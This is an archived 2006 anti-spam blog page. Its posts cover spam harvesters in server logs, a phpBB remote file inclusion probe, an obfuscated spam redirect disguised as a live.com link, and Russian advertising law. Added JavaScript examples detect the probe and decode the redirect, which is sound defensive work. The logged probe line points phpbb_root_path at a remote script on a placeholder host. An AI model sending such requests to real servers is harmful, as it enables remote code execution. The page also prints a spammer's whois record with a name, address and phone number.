Archive for September, 2006

Commenting on spamresources

Tuesday, September 19th, 2006

McAfee’s SiteAdvisor is ranking very high in Google these days, which means people are likely to check out what it has to say about domains they’re looking for.

Their testing is not always entirely accurate. Take Spamhuntress as an example.

They put one bad mark against my site for linking to a site they classified as bad.

But you can put up comments on sites, whether you own them or not.

That should be a golden opportunity to comment on spamresources, especially domains we’re likely to see as nameservers for spammy domains, and the webhosting companies and registrars often used by spammers.

Just one caution: If you do comment on other people’s sites, be responsible. Don’t be rude. Don’t get sued for libel. What you write needs to be true at the time of writing, and you’d better be prepared to show evidence of what you write.

208.66.195 spam harvester territory

Tuesday, September 19th, 2006

I found these in my logs:


Some are very hungry. We’re talking about a few hundred megabytes between them. And the bot is clueless, as this GET should illustrate:

GET /w/index.php?title=Special:Listadmins&amp%3Blimit=500&amp%3Boffset=0&feed=rss

Project Honeypot determined that this one was most likely a spam harvester. V7n also noticed its behavior and recommended blocking.

Blog ranking

Monday, September 18th, 2006

I found a blog ranking site. Thought it was interesting. Here’s my page on there:

URLFAN

Probing phpBB vulnerability

Sunday, September 17th, 2006

I saw some probing of phpBB in my logs. The probes looked like this:

GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me - phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I have since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject was not innocent. Let’s just put it like that for the time being.
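A log triage sketch for the two request lines quoted in this post and in the 208.66.195 harvester post. It is an added example, not code from the blog: it flags a query parameter whose value is an absolute URL (the shape of the phpbb_root_path probe) and parameter names that begin with a leftover "amp;" (the harvester following HTML-escaped links literally). The function names and finding labels are hypothetical.

```javascript
// Added example: classify request lines by two traits seen in these posts.
function safeDecode(s) {
  // Percent-decode, but keep the raw text if the encoding is malformed.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function classifyRequest(requestLine) {
  const m = /^([A-Z]+)\s+(\S+)/.exec(requestLine);
  if (!m) return { path: null, findings: ['unparseable'] };
  const target = m[2];
  const q = target.indexOf('?');
  const path = q === -1 ? target : target.slice(0, q);
  const query = q === -1 ? '' : target.slice(q + 1);
  const findings = [];
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const name = safeDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = safeDecode(eq === -1 ? '' : pair.slice(eq + 1));
    // Remote file inclusion probe: a parameter that points at an absolute URL.
    if (/^(https?|ftp):\/\//i.test(value)) {
      findings.push('remote-url-in-param:' + name);
    }
    // Clueless crawler: "&amp;" from HTML source was sent as-is, so the
    // parameter name arrives as "amp;limit" instead of "limit".
    if (/^amp;/i.test(name)) {
      findings.push('html-entity-in-param:' + name);
    }
  }
  return { path, findings };
}

// Request lines copied from the two posts.
const SAMPLE_LINES = [
  'GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?',
  'GET /w/index.php?title=Special:Listadmins&amp%3Blimit=500&amp%3Boffset=0&feed=rss',
];
for (const line of SAMPLE_LINES) {
  console.log(classifyRequest(line));
}
```

Legitimate redirect parameters also carry absolute URLs, so the first finding is a reason to look at the request, not a verdict by itself.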

We’re back

Saturday, September 16th, 2006

The site has been down for a while.

I’m sure most of you have already guessed why.

I guess I struck a nerve this last week or so, eh? Definitely an incentive to keep doing exactly what I’m doing.

Wired on webspam

Friday, September 15th, 2006

Spam + Blogs = Trouble

Throwing suspicion on Microsoft

Thursday, September 14th, 2006

I was tracing a spammer who used Plone redirect pages (isn’t every other spammer these days?).

When I found the redirect code, it had this URL in it:

http://www.live.com/?6772716C3529285C6665675B58601F535E5B1C4F5253164A50541457574355530D4144451A4B164B464336

I knew that domain belonged to Microsoft, and I’d already established that the redirect never went anywhere near Microsoft land, so what’s up?

Turns out the JavaScript throws away everything before the ? and then deobfuscates the numbers. So watch out for redirects that frame innocent domains!

Just to finish what I started:

The redirect is on doorgen.com, and it redirects to canadianpharmanetwork and torontodrugstore, affiliate number 2025.

Here’s the whois:

Seicha Alok Sight (support@doorgen.com)
140-18 rue des Fontinettes
Pas-de-Calais
Pas-de-Calais,62100
FR
Tel. +33.0610720912

This spammer is on 69.31.45.250 and 69.31.45.251 on Pilosoft.

Thanks to Dirk for figuring out the JavaScript.
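To check a redirect like this one, the query string can be decoded offline and the real host compared with the one on display. This is an added example, not the spammer's script and not code from this blog: the decoding rule (each hex byte plus its 1-based position gives the character) is inferred from the sample URL above, and the function names are hypothetical.

```javascript
// Added example: recover the destination hidden behind a decoy host.
// Assumption: byte i (1-based) was stored as charCode - i, inferred from
// the sample URL in the post rather than read from the original script.
function decodeHexQuery(url) {
  const q = url.indexOf('?');
  if (q === -1) return null;
  const hex = url.slice(q + 1); // everything before '?' is the decoy
  if (hex.length < 2 || hex.length % 2 !== 0 || !/^[0-9a-fA-F]+$/.test(hex)) {
    return null; // not an all-hex payload
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    const position = i / 2 + 1;
    const code = (parseInt(hex.slice(i, i + 2), 16) + position) & 0xff;
    out += String.fromCharCode(code);
  }
  return out;
}

function analyseRedirect(url) {
  const shownHost = new URL(url).hostname;
  const decoded = decodeHexQuery(url);
  let realHost = null;
  if (decoded !== null) {
    // A hex query that does not decode to a URL is left unflagged.
    try { realHost = new URL(decoded).hostname; } catch (e) { realHost = null; }
  }
  const suspicious = realHost !== null && realHost !== shownHost;
  return { shownHost, decoded, realHost, suspicious };
}

// The URL quoted in the post.
const SAMPLE = 'http://www.live.com/?6772716C3529285C6665675B58601F535E5B1C4F5253164A50541457574355530D4144451A4B164B464336';
console.log(analyseRedirect(SAMPLE));
```

On the sample, the displayed host is www.live.com while the decoded target sits on doorgen.com, which matches where the redirect was traced to.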

Advice on cutting down phpBB spam

Thursday, September 14th, 2006

Found this:

How to fight SPAM in forums?

Good advice on combatting spam on phpBB forums.  There’s an option to use a captcha for signing up as well, right?

My experience is that spammers register, then post once. More and more will never bother to post again. So banning isn’t so much the solution as making it difficult for them to register.

Plone spam gets more attention

Thursday, September 14th, 2006

Found a link to this post on Digitalpoint:

Plone Exploit that Caused Search Engine Spam is Fixed

Interestingly, I never received any spam for carokee.com. I’ve received plenty of spam for Plone pages, though.

Interesting domain name for the blog: spamspotter. But it’s a brand new blog, so we’ll see where they’re headed.

Spam law in Russia

Wednesday, September 13th, 2006

I met Anna Vlasova from Kaspersky labs when I went to Holland for the Spam Symposium earlier this year. She was talking about a new law going into effect this summer, so I asked her for a breakdown. She has allowed me to post her e-mail text here, for all of you to read:

Yes, now we have a new version of some law articles (valid from July 2006), but it is not a ‘spam law’. It regulates the advertising process, so it covers only some part of the e-mail spam. But in Russia most e-mail spam is advertising.

In the latest version of the law, the following points are of crucial importance:

1. The introduction of the concept of ‘advertising distributed via electronic networks’. This means that the law applies to advertising sent via email, and spam which is of an advertising nature will be covered by this law. The word ‘spam’ itself is not used in the law.

2. The law also legislates the ‘opt-in’ principle (i.e. preliminary agreement to receive messages, or a subscription to messages).

3. It is assumed that an agreement to receive such messages does not exist, i.e. the originator of a mailing (for instance, a spammer) will have to show that the user agreed to receive advertising. Otherwise the advertising will be viewed as not in accordance with the law.

4. Automatic mailings are prohibited. It’s true that the law talks about prohibiting the use of tools which work ‘without human participation’. In such cases, it will be difficult to demonstrate that spam is sent fully automatically.

Here is a comment on the new law:
http://www.spamtest.ru/document.html?pubid=183916209&context=9562

and here is the text of the new law (Article 18 covers ‘advertising distributed via electronic networks’): http://www.brandfabrica.ru/law/adv/ In Russian the title of Article 18 is ‘Статья 18. Реклама, распространяемая по сетям электросвязи и размещаемая на почтовых отправлениях’ (“Article 18. Advertising distributed via telecommunication networks and placed on postal items”).